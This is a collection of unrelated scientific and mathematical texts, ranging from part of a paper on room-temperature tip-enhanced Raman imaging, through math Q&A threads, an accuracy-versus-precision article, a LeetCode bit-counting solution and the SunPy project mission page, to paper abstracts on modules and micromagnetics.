molecules due to the local pH differences58. However, in our work, the spin-coated BCB molecules are physisorbed on the Au surface (not chemically bound) and the proton transfer process rarely occurs because of the encapsulating dielectric layer on the molecules59. Second, spectral shifts can be observed by the hot-carrier injection from the plasmonic metal to molecules because it can cause a change in molecular bond lengths60. However, in our experiment, we exclude this hot-carrier injection effect because the tip-molecule distance is maintained at ~3 nm and the dielectric capping layer also suppresses the hot-carrier injection. Third, a previous study demonstrated that oxidation-reduction reaction of molecules could be induced by electrochemical TERS61. However, since we do not apply external bias to the BCB molecules, we believe the redox effect is negligible in our observed spectral shifts. Lastly, the Stark effect was experimentally observed for single molecules sandwiched with the metal nano-gap when the applied DC electric fields at the gap was large enough (~10 V/nm)62. Since we do not apply external bias to the BCB molecules, we can ignore the Stark effect. In summary, we demonstrated the hyperspectral TERS imaging of possibly single molecules at room temperature by optimizing experimental conditions. In addition, the thin dielectric Al2O3 layer encapsulating the single molecules adsorbed onto the Au (111) surface played a significant role, as a freeze-frame, in enabling room temperature single-molecule TERS imaging. This is because the thin dielectric layer can suppress the rotational and spectral diffusions of molecules and inhibit the chemical reactions and contaminations in air, including potential physisorption of molecules onto the Au tip63,64. Through this room-temperature TERS imaging approach at the single-molecule level, we examined the conformational heterogeneity of BCB molecules with supporting theoretical DFT calculations. 
We envision that the presented optimal experimental setup for single-molecule TERS measurements will be broadly exploited to investigate unrevealed single-molecule characteristics at room temperature. For example, we can investigate intramolecular vibrational relaxation more accurately at the single-molecule level using this freeze-frame and variable-temperature TERS5. In addition, the single-molecule strong coupling study at room temperature will be more easily accessible and various advanced studies will be enabled6, such as tip-enhanced plasmon-phonon strong coupling and investigation of the coupling strength with respect to the molecular orientation. Furthermore, this approach can extend to the single-molecule transistor studies at room temperature with very robust conditions, e.g., suppressing spectral fluctuations, photobleaching, and contaminations. ## Methods ### Sample preparation Coverslips (thickness: 170 μm) for non-optimal rough metal films (Fig. 1c) were cleaned with piranha solution (3:1 mixture of H2SO4 and H2O2) for >60 min and ultrasonicated in deionized water. The other coverslips for optimal smooth metal films (Fig. 1d) were ultrasonicated in acetone and isopropanol for 10 mins each, followed by O2 plasma treatment for 10 mins. The coverslips were then deposited with a Cr adhesion layer with a thickness of 2 nm (a rate of 0.01 nm/s) and subsequently deposited with Au films with varying thicknesses (0.01 nm/s to 0.1 nm/s) at the base pressure of ~10−6 torr using a conventional thermal evaporator. The deposition rate of metals was precisely controlled using a quartz crystal microbalance detector. The transmittance spectra of the substrates were measured by a UV–Vis spectrometer (UV-1800, Shimadzu). Next, BCB molecules in ethanol solution (100 nM for the single-molecule experiment and 1.0 mM for the thickness optimization process) were spin-coated on the metal thin films at 150 × g (3000 rpm). Finally, an Al2O3 capping layer with a thickness of 0.5 nm was deposited on the sample surface using an atomic layer deposition system (Lucida D100, NCD Co.). The Al2O3 layer was deposited with the growth rate of 0.11 nm per cycle at the temperature of 150 °C under the base pressure of 40 mTorr. Precursor for the Al2O3 ALD was trimethylaluminum (TMA) vapor, and H2O vapor as the oxidant with N2 carrier gas. ### TERS imaging setup For TERS experiments, we used a commercial optical spectroscopy system combined with an AFM (NTEGRA Spectra II, NT-MDT). The excitation beam from a single-mode-fiber-coupled He-Ne laser (λ = 632.8 nm, optical power P of ≥100 μW) passed through a half-wave plate (λ/2) and was collimated using two motorized lenses. The beam passed through a radial polarizer and was focused onto the sample surface with an oil immersion lens (NA = 1.3, RMS100X-PFOD, Olympus) in the inverted optical microscope geometry. The electrochemically etched Au tip (apex radius of ~10 nm) attached on a tuning fork was controlled using a PZT scanner to alter the position of the Au tip with respect to the focused laser beam. The backscattered signals were collected through the same optics and transmitted to a spectrometer and charge-coupled device (Newton, Andor) after passing through an edge filter (633 nm cut off). The spectrometer was calibrated using a mercury lamp and the Si Raman peak at 520 cm−1, and its spectral resolution was ~4.3 cm−1 for a 600 g/mm grating. ### FDTD simulation of optical field distribution We used FDTD simulations (Lumerical Solutions, Inc.) 
to quantify the optical field enhancement at the apex of the Au tip with respect to the metal film thickness. The distance between the Au tip and the Au film was set to 2–4 nm based on our experimental condition. As a fundamental excitation source, monochromatic 632.8 nm light was used with linear polarization parallel to the tip axis. The theoretical transmittance of thin gold films was calculated using the material properties obtained from ref. 52. ### DFT calculation of BCB vibrational modes DFT calculations were performed using the Vienna Ab initio Simulation Package to identify the normal vibrational modes of a single BCB molecule. In our simulation model, the chemical environment and molecular orientation were critically considered; i.e., the vibrational modes for a BCB molecule placed in a free space and adsorbed onto the Au (111) surface in different orientations and positions were calculated. Specifically, molecules oriented normal and parallel to the Au surface were modeled. For a molecule placed parallel to the Au surface, the lateral position was varied, as shown in Fig. 5, to consider the effect of an interaction between the atoms of the BCB molecule and those of the Au surface. To describe the adsorption of a molecule on the Au (111) surface, Tkatchenko and Scheffler dispersion correction65 with the Perdew–Burke–Ernzerhof exchange functional66 was employed. Regarding the Au (111) slab supercell, four layers of Au atoms were considered, with the top two layers optimized in the gamma point. Furthermore, 1.5 nm vacuum space was considered to avoid an interaction between periodic slabs, and the plane-wave energy cutoff was set to 550 eV. The vibrational modes of the BCB molecule were shown using visualization for electronic and structural analysis.
# Electric field inside a hollow ball, off-center within a homogeneously charged ball

Q: We have a homogeneously charged ball with radius R which contains a ball-shaped hollow (with radius r, and with distance b from the center of the bigger ball (M) to the center of the hollow (N)). What is now the field force inside the hollow, depending on b?

————

I first thought about calculating E(ball of radius R, without a hollow) − E(hollow of radius r, displaced) to use the superposition principle, but then I would have no idea how to calculate the latter of those… I would be happy about any hints!

- "... the field force.." Are you looking for the electric field, or a force the electric field exerts on some other object? Not to reprimand you, but this is a common error students make - make sure you distinguish electric field and electric force. These are related but distinct concepts. – DJBunk Feb 22 '13 at 21:33
Thank you for the correction! To be precise: here I'm looking for the electric field… :) – user20486 Feb 22 '13 at 21:51
Couldn't you use the superposition principle, treating the hollow as a homogeneous charged ball with radius r with opposite charge density from the ball with radius R? – KDN Feb 23 '13 at 0:55
@user20486 - you might want to edit the question to reflect this, at the very least for people looking at the question in the future. Thanks. – DJBunk Feb 23 '13 at 20:51

The answer is indeed the superposition principle. You have to calculate both the field of the ball with radius R and the field of a ball with radius r, placed away from the center at a distance b. Then you subtract the field of the smaller ball from the larger one and you are done. This is equivalent to a superposition of the fields of two balls with charge of opposite sign.

- Thank you! This also seems to me the most reasonable way - it leads to calculating and subtracting those two electric fields (one standard electric-field calculation for any point inside a homogeneously charged ball, and the same again with a smaller radius and a displaced center at the same charge density, where one just has to do a substitution) – user20486 Feb 24 '13 at 17:56
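Following up on the accepted superposition argument, here is a short worked version (my own sketch, in SI units, with $\rho$ the uniform charge density, $\vec{b}$ the vector from the big ball's center $M$ to the hollow's center $N$, and $\vec{r}_M$, $\vec{r}_N$ the position vectors of the field point measured from $M$ and $N$):

$$\vec{E}_{\text{full ball}} = \frac{\rho\,\vec{r}_M}{3\varepsilon_0}, \qquad \vec{E}_{\text{small ball}} = \frac{\rho\,\vec{r}_N}{3\varepsilon_0},$$
$$\vec{E}_{\text{hollow}} = \frac{\rho\,\vec{r}_M}{3\varepsilon_0} - \frac{\rho\,\vec{r}_N}{3\varepsilon_0} = \frac{\rho}{3\varepsilon_0}\left(\vec{r}_M - \vec{r}_N\right) = \frac{\rho\,\vec{b}}{3\varepsilon_0}.$$

So the field inside the hollow is uniform: it points from $M$ towards $N$, and its magnitude $\rho b/(3\varepsilon_0)$ grows linearly with $b$.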
# Accuracy and precision

In the fields of engineering, industry and statistics, the accuracy of a measurement system is the degree of closeness of measurements of a quantity to its actual (true) value. The precision of a measurement system, also called reproducibility or repeatability, is the degree to which repeated measurements under unchanged conditions show the same results.[1] Although the two words can be synonymous in colloquial use, they are deliberately contrasted in the context of the scientific method. Accuracy indicates the proximity of measurement results to the true value; precision refers to the repeatability or reproducibility of the measurement. A measurement system can be accurate but not precise, precise but not accurate, neither, or both. For example, if an experiment contains a systematic error, then increasing the sample size generally increases precision but does not improve accuracy. Eliminating the systematic error improves accuracy but does not change precision. A measurement system is called valid if it is both accurate and precise. Related terms are bias (non-random or directed effects caused by a factor or factors unrelated to the independent variable) and error (random variability), respectively. The terminology is also applied to indirect measurements, that is, values obtained by a computational procedure from observed data.

## Accuracy versus precision; the target analogy

[Figures: target patterns illustrating high accuracy but low precision, and high precision but low accuracy]

Accuracy is the degree of veracity while precision is the degree of reproducibility. The analogy used here to explain the difference between accuracy and precision is the target comparison. In this analogy, repeated measurements are compared to arrows that are shot at a target. Accuracy describes the closeness of arrows to the bullseye at the target center. Arrows that strike closer to the bullseye are considered more accurate. The closer a system's measurements are to the accepted value, the more accurate the system is considered to be. To continue the analogy, if a large number of arrows are shot, precision would be the size of the arrow cluster. (When only one arrow is shot, precision is the size of the cluster one would expect if this were repeated many times under the same conditions.) When all arrows are grouped tightly together, the cluster is considered precise since they all struck close to the same spot, even if not necessarily near the bullseye. The measurements are precise, though not necessarily accurate. However, it is not possible to reliably achieve accuracy in individual measurements without precision—if the arrows are not grouped close to one another, they cannot all be close to the bullseye. (Their average position might be an accurate estimation of the bullseye, but the individual arrows are inaccurate.) See also circular error probable for application of precision to the science of ballistics.

## Quantifying accuracy and precision

Ideally a measurement device is both accurate and precise, with measurements all close to and tightly clustered around the known value. The accuracy and precision of a measurement process is usually established by repeatedly measuring some traceable reference standard.
Such standards are defined in the International System of Units and maintained by national standards organizations such as the National Institute of Standards and Technology. This also applies when measurements are repeated and averaged. In that case, the term standard error is properly applied: the precision of the average is equal to the known standard deviation of the process divided by the square root of the number of measurements averaged. Further, the central limit theorem shows that the probability distribution of the averaged measurements will be closer to a normal distribution than that of individual measurements. With regard to accuracy we can distinguish: • the difference between the mean of the measurements and the reference value, the bias. Establishing and correcting for bias is necessary for calibration. • the combined effect of that and precision. A common convention in science and engineering is to express accuracy and/or precision implicitly by means of significant figures. Here, when not explicitly stated, the margin of error is understood to be one-half the value of the last significant place. For instance, a recording of 843.6 m, or 843.0 m, or 800.0 m would imply a margin of 0.05 m (the last significant place is the tenths place), while a recording of 8,436 m would imply a margin of error of 0.5 m (the last significant digits are the units). A reading of 8,000 m, with trailing zeroes and no decimal point, is ambiguous; the trailing zeroes may or may not be intended as significant figures. To avoid this ambiguity, the number could be represented in scientific notation: 8.0 × 103 m indicates that the first zero is significant (hence a margin of 50 m) while 8.000 × 103 m indicates that all three zeroes are significant, giving a margin of 0.5 m. Similarly, it is possible to use a multiple of the basic measurement unit: 8.0 km is equivalent to 8.0 × 103 m. In fact, it indicates a margin of 0.05 km (50 m). However, reliance on this convention can lead to false precision errors when accepting data from sources that do not obey it. Looking at this in another way, a value of 8 would mean that the measurement has been made with a precision of 1 (the measuring instrument was able to measure only down to 1s place) whereas a value of 8.0 (though mathematically equal to 8) would mean that the value at the first decimal place was measured and was found to be zero. (The measuring instrument was able to measure the first decimal place.) The second value is more precise. Neither of the measured values may be accurate (the actual value could be 9.5 but measured inaccurately as 8 in both instances). Thus, accuracy can be said to be the 'correctness' of a measurement, while precision could be identified as the ability to resolve smaller differences. Precision is sometimes stratified into: • Repeatability — the variation arising when all efforts are made to keep conditions constant by using the same instrument and operator, and repeating during a short time period; and • Reproducibility — the variation arising using the same measurement process among different instruments and operators, and over longer time periods. ## Accuracy and precision in binary classification Accuracy is also used as a statistical measure of how well a binary classification test correctly identifies or excludes a condition. 
|  | Condition true (as determined by the gold standard) | Condition false (as determined by the gold standard) |  |
|---|---|---|---|
| Test outcome positive | True positive | False positive | → Positive predictive value |
| Test outcome negative | False negative | True negative | → Negative predictive value |
|  | ↓ Sensitivity | ↓ Specificity | Accuracy |

That is, the accuracy is the proportion of true results (both true positives and true negatives) in the population. It is a parameter of the test.

$\text{accuracy}=\frac{\text{number of true positives}+\text{number of true negatives}}{\text{number of true positives}+\text{false positives} + \text{false negatives} + \text{true negatives}}$

On the other hand, precision is defined as the proportion of the true positives against all the positive results (both true positives and false positives):

$\text{precision}=\frac{\text{number of true positives}}{\text{number of true positives}+\text{false positives}}$

An accuracy of 100% means that the measured values are exactly the same as the given values. Also see Sensitivity and specificity. (A short numerical sketch of these formulas appears after the reference list below.)

Accuracy may be determined from Sensitivity and Specificity, provided Prevalence is known, using the equation:

$\text{accuracy}=(\text{sensitivity})(\text{prevalence}) + (\text{specificity})(1-\text{prevalence})$

The accuracy paradox for predictive analytics states that predictive models with a given level of accuracy may have greater predictive power than models with higher accuracy. It may be better to avoid the accuracy metric in favor of other metrics such as precision and recall.

## Accuracy and precision in psychometrics and psychophysics

In psychometrics and psychophysics, the term accuracy is used interchangeably with validity and constant error. Precision is a synonym for reliability and variable error. The validity of a measurement instrument or psychological test is established through experiment or correlation with behavior. Reliability is established with a variety of statistical techniques, classically through an internal consistency test like Cronbach's alpha to ensure sets of related questions have related responses, and then comparison of those related questions between reference and target populations.

## Accuracy and precision in Logic Simulation

In logic simulation, a common mistake in the evaluation of accurate models is to compare a logic simulation model to a transistor circuit simulation model. This is a comparison of differences in precision, not accuracy. Precision is measured with respect to detail and accuracy is measured with respect to reality.[2][3]

## Accuracy and precision in information systems

The concepts of accuracy and precision have also been studied in the context of databases, information systems and their sociotechnical context. The necessary extension of these two concepts on the basis of theory of science suggests that they (as well as data quality and information quality) should be centered on accuracy, defined as the closeness to the true value seen as the degree of agreement of readings or of calculated values of one same conceived entity, measured or calculated by different methods, in the context of maximum possible disagreement.[4]

## References

1. ^ John Robert Taylor (1999). An Introduction to Error Analysis: The Study of Uncertainties in Physical Measurements. University Science Books. pp. 128–129. ISBN 093570275X.
2. ^ John M. Acken, Encyclopedia of Computer Science and Technology, Vol 36, 1997, page 281-306
3. ^ 1990 Workshop on Logic-Level Modelling for ASICS, Mark Glasser, Rob Mathews, and John M. Acken, SIGDA Newsletter, Vol 20.
Number 1, June 1990.
4. ^ Ivanov, K. (1972). "Quality-control of information: On the concept of accuracy of information in data banks and in management information systems". The University of Stockholm and The Royal Institute of Technology. Doctoral dissertation. Further details are found in Ivanov, K. (1995). A subsystem in the design of informatics: Recalling an archetypal engineer. In B. Dahlbom (Ed.), The infological equation: Essays in honor of Börje Langefors, (pp. 287-301). Gothenburg: Gothenburg University, Dept. of Informatics (ISSN 1101-7422).
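As mentioned above, here is a minimal numerical sketch of the binary-classification formulas (the counts are invented for illustration, not data from the article):

```python
# Illustrative sketch of the accuracy/precision formulas for a binary test.
tp, fp, fn, tn = 45, 5, 10, 940  # true/false positives, false/true negatives (made-up counts)

accuracy = (tp + tn) / (tp + fp + fn + tn)   # proportion of true results
precision = tp / (tp + fp)                   # positive predictive value
sensitivity = tp / (tp + fn)                 # true positive rate
specificity = tn / (tn + fp)                 # true negative rate
prevalence = (tp + fn) / (tp + fp + fn + tn)

# Accuracy recovered from sensitivity, specificity and prevalence:
accuracy_from_rates = sensitivity * prevalence + specificity * (1 - prevalence)

print(f"accuracy={accuracy:.3f}, precision={precision:.3f}")
print(f"check: {accuracy_from_rates:.3f}")   # matches `accuracy`
```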
# Definition of Pie Chart or Pie Graph

A Pie Chart (or Pie Graph) uses sectors of a circle to represent data. The data is broken up into categories, depending on responses to a question. The size of each sector shows what proportion of the data is in each category. In the example, the pie chart displays the proportions of the total number of scouts attending a district camp who come from each scout group in the district.

### Description

The aim of this dictionary is to provide definitions of common mathematical terms. Students learn a new math skill every week at school; if they want to look up what a specific term means just before they start a new skill, this dictionary becomes a handy go-to guide.

### Audience

Year 1 to Year 12 students

### Learning Objectives

Learn common math terms starting with letter P

Author: Subject Coach
Added on: 6th Feb 2018
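A minimal plotting sketch of the definition above (the scout-group names and counts are invented for illustration; assumes Matplotlib is available):

```python
import matplotlib.pyplot as plt

# Invented example data: number of scouts attending camp from each group.
groups = ["1st Riverside", "2nd Hilltop", "3rd Lakeview", "4th Meadow"]
counts = [24, 18, 30, 8]

# Each sector's angle is proportional to its category's share of the total.
plt.pie(counts, labels=groups, autopct="%1.0f%%")
plt.title("Scouts at district camp, by group")
plt.show()
```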
# Math Help - Gauss-Bonnet theorem

1. ## Gauss-Bonnet theorem

For this surface M, I guess I need to show M has no boundary, and find the Euler characteristic of M. How to do this?

2. ## Re: Gauss-Bonnet theorem

You can show that M is homeomorphic to S^2, so it has no boundary and its Euler characteristic is 2. To show that M is homeomorphic to S^2 = {(x,y,z) | x^2+y^2+z^2 = 1}, define a map f: M -> S^2 by f(p) = p/|p| and try to show that f is a homeomorphism (actually it is a diffeomorphism).

3. ## Re: Gauss-Bonnet theorem

Ok thanks, so the total curvature is 2 × 2π = 4π. What about (ii)?

4. ## Re: Gauss-Bonnet theorem

(ii) is a direct application of the theorem. −4π = 2π·χ, so χ = −2. It is a double torus.
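For reference, both computations in the thread follow from the closed-surface form of the Gauss-Bonnet theorem; a short worked version:

$$\int_M K \, dA = 2\pi\,\chi(M).$$

For $M \cong S^2$ we have $\chi(M)=2$, so the total curvature is $2\pi\cdot 2 = 4\pi$. Conversely, if a closed surface has total curvature $-4\pi$, then $2\pi\chi = -4\pi$ gives $\chi = -2$; since $\chi = 2-2g$ for a closed orientable surface, the genus is $g=2$, i.e. a double torus.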
# Why does y=cot(theta) have zeros at the points where y=tan(theta) has asymptotes y=tan(theta) has an asymptote when theta= pi/2 because 1/0 is undefined, and the Taylor Series for tan approaching this point just goes on indefinitely I'm guessing (I'm in gr 11 so I'm new to all this). When reciprocating tan, how and why are we allowed to reciprocate 1/0. I'm sure there's rules math rules behind reciprocating fractions when dividing. Can someone maybe offer 1) a proof of why reciprocating a fraction when dividing, turning it into multiplication works. 2) If it isn't already clear from the answer to 1), could you explain what allows us to reciprocate 1/0 to 0/1 when converting tan to cot. when reciprocating something don't we also set restrictions to the denominator. but even then, is tan(theta) the initial function we are setting restrictions on or is cot(theta) the initial function? What I think might be the answer is that cot is only the inverse of tan when tan or cot has the restriction that theta cannot equal n*(pi/2) where {nEZ}. And in cases where theta is n*(pi/2) where {nEZ}, cot and tan are not the reciprocal of each other. My teacher insists on using circular arguments, so im stuck • $\cot\theta = 1/\tan\theta$. – amd Apr 22 '19 at 21:58 • Please use MathJax to format your posts. They'll be a lot easier to read. – saulspatz Apr 22 '19 at 22:32 The best way to look at this is geometrically. Picture a unit circle in the $$x,y$$ plane centered at the origin and let point $$A$$ be at $$(1,0)$$. Now draw point $$P$$ on the circle and let $$P$$ wander along the circle in such a way that at any given time, angle $$AOP$$ is $$\theta$$. Drop perpendiculars to the $$x$$ and $$y$$ axes from $$p$$; let their (signed) lengths be $$X$$ and $$Y$$. In this geometric picture, the function $$\tan \theta$$ can be viewed as the ratio $$Y/X$$ provided $$P$$ is not on the $$y$$ axis. We don't try to define $$\tan \theta$$ when $$P$$ is on the $$y$$ axis, because we want to stay away from dividing by zero. Similarly, the function $$\cot \theta$$ can be viewed as the ratio $$X/Y$$ provided $$P$$ is not on the $$x$$ axis. Again, we avoid division by zero. Then the fundamental relation holds everywhere that cotangent and tangent can both be defined: $$\cot \theta = \frac1{\tan \theta}$$ Now we look at how a plot of $$\tan \theta$$ on a graph, with $$\theta$$ as the left-right coordinate and $$\tan \theta$$ as the vertical coordinate. As we approach the "forbidden" point the value gets greater and greater without limit; we say it "approaches infinity" and we note that it gets closer and closer to the vertical line $$x = 90^\circ$$. It is not a coincidence that at than same value of $$\theta$$, $$\cot \theta = 0$$, because of necessity it will get arbitrarily small as $$\tan \theta$$ gets arbitrarily large. But we can't, without a good deal more care than you would be able to give at your level, blithely say that "$$1/\infty = 0$$" or "$$1/0 = +\infty$$". That works out fine in this case but it would be a bad habit to get into because it can lead to manipulations which give wrong answers in other cases.
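A compact way to state the answer above, working only with sine and cosine (which are defined everywhere):

$$\tan\theta = \frac{\sin\theta}{\cos\theta}, \qquad \cot\theta = \frac{\cos\theta}{\sin\theta},$$

and $\cot\theta = 1/\tan\theta$ holds only where both are defined, i.e. where $\sin\theta\neq 0$ and $\cos\theta\neq 0$. At $\theta = \frac{\pi}{2}+n\pi$ we have $\cos\theta = 0$ and $\sin\theta = \pm 1$, so $\tan\theta$ is undefined (a vertical asymptote) while $\cot\theta = 0/(\pm 1) = 0$ directly from its own definition; no reciprocation of $1/0$ is ever needed.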
# LeetCode Problem 191 (Number of 1 Bits)

Write a function that takes an unsigned integer and returns the number of '1' bits it has (also known as the Hamming weight).

For example, the 32-bit integer '11' has binary representation 00000000000000000000000000001011, so the function should return 3.

class Solution {
public:
    int hammingWeight(uint32_t n) {
        int count = 0;
        uint32_t test_bit = 1;            // mask with a single bit set, starting at bit 0
        for (int i = 0; i < 32; i++) {    // test each of the 32 bit positions
            if (test_bit & n) count++;    // this bit of n is set
            test_bit = test_bit << 1;     // shift the mask to the next bit position
        }
        return count;
    }
};
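A common alternative (not part of the original post) is Brian Kernighan's trick, which clears the lowest set bit on each iteration and therefore loops only once per set bit; a minimal Python sketch:

```python
def hamming_weight(n: int) -> int:
    """Count set bits by repeatedly clearing the lowest set bit."""
    count = 0
    while n:
        n &= n - 1   # n - 1 flips the lowest set bit and all bits below it
        count += 1
    return count

assert hamming_weight(0b1011) == 3
```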
# Cauchy sequence/Definition

Given a metric space [ilmath](X,d)[/ilmath], a sequence [ilmath](x_n)_{n=1}^\infty\subseteq X[/ilmath] is said to be a Cauchy sequence[1][2] if:

• [ilmath]\forall\epsilon > 0\exists N\in\mathbb{N}\forall n,m\in\mathbb{N}[n\ge m> N\implies d(x_m,x_n)<\epsilon][/ilmath][Note 1][Note 2]

In words it is simply:

• For any arbitrary distance apart, there exists a point such that any two points in the sequence after that point are within that arbitrary distance of each other.

## Notes

1. Note that in Krzysztof Maurin's notation this is written as $\bigwedge_{\epsilon>0}\bigvee_{N\in\mathbb{N}}\bigwedge_{m,n>N}d(x_n,x_m)<\epsilon$ - which is rather elegant
2. It doesn't matter if we use [ilmath]n\ge m>N[/ilmath] or [ilmath]n,m\ge N[/ilmath] because if [ilmath]n=m[/ilmath] then [ilmath]d(x_n,x_m)=0[/ilmath]; it doesn't matter which way we consider them (as [ilmath]n>m[/ilmath] or [ilmath]m>n[/ilmath]) since [ilmath]d(x,y)=d(y,x)[/ilmath] - I use the ordering to give the impression that as [ilmath]n[/ilmath] goes out ahead it never ventures far (as in [ilmath]\epsilon[/ilmath]-distance) from [ilmath]x_m[/ilmath]. This has served me well.

## References

1. Functional Analysis - George Bachman and Lawrence Narici
2. Analysis - Part 1: Elements - Krzysztof Maurin
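As a worked example of the definition (my own addition, not from the page): in $\mathbb{R}$ with the usual metric, the sequence $x_n = \frac{1}{n}$ is Cauchy. Given $\epsilon>0$, pick $N\in\mathbb{N}$ with $N>\frac{2}{\epsilon}$; then for any $n\ge m>N$:

$$d(x_m,x_n)=\left|\frac{1}{m}-\frac{1}{n}\right|\le\frac{1}{m}+\frac{1}{n}<\frac{2}{N}<\epsilon.$$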
MATLIS INJECTIVE MODULES Title & Authors MATLIS INJECTIVE MODULES Yan, Hangyu; Abstract In this paper, Matlis injective modules are introduced and studied. It is shown that every R-module has a (special) Matlis injective preenvelope over any ring R and every right R-module has a Matlis injective envelope when R is a right Noetherian ring. Moreover, it is shown that every right R-module has an $\small{{\mathcal{F}}^{{\perp}1}}$-envelope when R is a right Noetherian ring and $\small{\mathcal{F}}$ is a class of injective right R-modules. Keywords Matlis injective module;(pre)envelope;$\small{{\sum}}$-pure injective; Language English Cited by 1. Relative Projective and Injective Dimensions, Communications in Algebra, 2016, 44, 8, 3383 References 1. F. W. Anderson and K. R. Fuller, Rings and Categories of Modules, Grad. Texts in Math. 13, Springer-Verlag, New York 1974. 2. S. Bazzoni, When are definable classes tilting and cotilting classes?, J. Algebra 320 (2008), no. 12, 4281-4299. 3. H. Cartan and S. Eilenberg, Homological Algebra, Princeton Math. Ser., 1956. 4. P. C. Eklof and S. Shelah, On Whitehead modules, J. Algebra 142 (1991), no. 2, 492-510. 5. P. C. Eklof and J. Trlifaj, How to make Ext vanish, Bull. Lond. Math. Soc. 23 (2001), no. 1, 41-51. 6. E. E. Enochs, Injective and flat covers, envelopes and resolvents, Israel J. Math. 39 (1981), no. 3, 189-209. 7. E. E. Enochs and O. M. G. Jenda, Copure injective modules, Quaest. Math. 14 (1991), no. 4, 401-409. 8. E. E. Enochs and O. M. G. Jenda, Relative Homological Algebra, de Gruyter Expos. Math. 30, de Gruyter, Berlin 2000. 9. A. Facchini, Module Theory: Endomorphism Rings and Direct Sum Decompositions in Some Classes of Modules, Progress in Math. vol. 167, Birkhauser, Basel, 1998. 10. R. Gobel and J. Trlifaj, Approximations and Endomorphism Algebras of Modules, de Gruyter Expos. Math. 41, de Gruyter, Berlin 2006. 11. P. A. Guil Asensio and I. Herzog, Sigma-cotorsion rings, Adv. Math. 191 (2005), no. 1, 11-28. 12. T. Y. Lam, Lectures on Modules and Rings, Grad. Texts in Math. 189, Springer, New York 1999. 13. J. J. Rotman, An Introduction to Homological Algebra, Pure Appl. Math. 85, Academic Press, New York 1979.
# Our Mission

SunPy is a community-developed, free and open-source software package for solar physics. It aims to provide a comprehensive data analysis environment that allows researchers within the field of solar physics to carry out their tasks with minimal effort. SunPy is written in the Python programming language and is built upon the scientific Python environment, which includes several core packages such as NumPy, SciPy, Matplotlib and Pandas. Since SunPy deals with key astrophysical concepts, its development is closely associated with that of Astropy, which is a fundamental package within the Python astronomy ecosystem.

The SunPy package was established on the 28th of March 2011 by a small group of scientists and developers at the NASA Goddard Space Flight Center. Since that time, SunPy has grown from this small group into a large community Python package. Furthermore, the SunPy project was established in order to further the goals of the SunPy package. The SunPy project (also known as the SunPy organization) wants to provide the software tools necessary so that anyone can analyze the ever-increasing catalogue of solar data. This enables the targeted support of other solar physics Python packages that do not fall within the scope of the core SunPy package. We are proud to be a NumFOCUS-sponsored project and have been supported by ESA, the PSF and Google, to name a few. SunPy has become a global project that is not associated with any individual institution. More information about the SunPy project can be found on The Project page.

# Code of Conduct

We have a Code of Conduct, which we expect everyone to follow.

## Acknowledging or Citing SunPy

If you have used SunPy in your scientific work we would appreciate it if you would acknowledge it. The continued growth and development of SunPy is dependent on the community being aware of SunPy.

# Publications

This research has made use of SunPy vX.Y, an open-source and free community-developed solar data analysis Python package (citation). The citation should be to the SunPy paper, and the version number should cite the Zenodo DOI for the version used in your work.

@ARTICLE{2015CS&D....8a4009S, author = {{SunPy Community}, T. and {Mumford}, S.~J. and {Christe}, S. and {P{\'e}rez-Su{\'a}rez}, D. and {Ireland}, J. and {Shih}, A.~Y. and {Inglis}, A.~R. and {Liedtke}, S. and {Hewett}, R.~J. and {Mayer}, F. and {Hughitt}, K. and {Freij}, N. and {Meszaros}, T. and {Bennett}, S.~M. and {Malocha}, M. and {Evans}, J. and {Agrawal}, A. and {Leonard}, A.~J. and {Robitaille}, T.~P. and {Mampaey}, B. and {Iv{\'a}n Campos-Rozo}, J. and {Kirk}, M.~S.}, title = "{SunPy{\mdash}Python for solar physics}", journal = {Computational Science and Discovery}, archivePrefix = "arXiv", eprint = {1505.02563}, primaryClass = "astro-ph.IM", year = 2015, month = jan, volume = 8, number = 1, eid = {014009}, pages = {014009}, doi = {10.1088/1749-4699/8/1/014009},
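To record the exact version for the citation described above, a one-line check works (assuming SunPy is installed):

```python
import sunpy
print(sunpy.__version__)   # version string to quote alongside the matching Zenodo DOI
```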
Sharp upper bounds for a singular perturbation problem related to micromagnetics

Annali della Scuola Normale Superiore di Pisa - Classe di Scienze, Série 5, Tome 6 (2007) no. 4, p. 673-701

We construct an upper bound for the following family of functionals $\{E_\epsilon\}_{\epsilon>0}$, which arises in the study of micromagnetics:

$$E_\epsilon(u) = \int_\Omega \epsilon\,|\nabla u|^2 + \frac{1}{\epsilon}\int_{\mathbb{R}^2} |H_u|^2.$$

Here $\Omega$ is a bounded domain in $\mathbb{R}^2$, $u\in H^1(\Omega,S^1)$ (corresponding to the magnetization) and $H_u$, the demagnetizing field created by $u$, is given by

$$\begin{cases} \operatorname{div}\,(\tilde{u}+H_u)=0 & \text{in } \mathbb{R}^2\,, \\ \operatorname{curl}\,H_u=0 & \text{in } \mathbb{R}^2\,, \end{cases}$$

where $\tilde{u}$ is the extension of $u$ by $0$ in $\mathbb{R}^2\setminus\Omega$. Our upper bound coincides with the lower bound obtained by Rivière and Serfaty.

Classification: 49J45, 35B25, 35J20

@article{ASNSP_2007_5_6_4_673_0, author = {Poliakovsky, Arkady}, title = {Sharp upper bounds for a singular perturbation problem related to micromagnetics}, journal = {Annali della Scuola Normale Superiore di Pisa - Classe di Scienze}, publisher = {Scuola Normale Superiore, Pisa}, volume = {Ser. 5, 6}, number = {4}, year = {2007}, pages = {673-701}, zbl = {1150.49006}, mrnumber = {2394415}, language = {en}, url = {http://www.numdam.org/item/ASNSP_2007_5_6_4_673_0} }

Poliakovsky, Arkady. Sharp upper bounds for a singular perturbation problem related to micromagnetics. Annali della Scuola Normale Superiore di Pisa - Classe di Scienze, Série 5, Tome 6 (2007) no. 4, pp. 673-701. http://www.numdam.org/item/ASNSP_2007_5_6_4_673_0/

[1] L. Ambrosio, C. De Lellis and C. Mantegazza, Line energies for gradient vector fields in the plane, Calc. Var. Partial Differential Equations 9 (1999), 327-355. | MR 1731470 | Zbl 0960.49013
[2] L. Ambrosio, N. Fusco and D. Pallara, "Functions of Bounded Variation and Free Discontinuity Problems", Oxford Mathematical Monographs, Oxford University Press, New York, 2000. | MR 1857292 | Zbl 0957.49001
[3] P. Aviles and Y. Giga, A mathematical problem related to the physical theory of liquid crystal configurations, Proc. Centre Math. Anal. Austral. Nat. Univ. 12 (1987), 1-16. | MR 924423
[4] P. Aviles and Y. Giga, On lower semicontinuity of a defect energy obtained by a singular limit of the Ginzburg-Landau type energy for gradient fields, Proc. Roy. Soc. Edinburgh Sect. A 129 (1999), 1-17. | MR 1669225 | Zbl 0923.49008
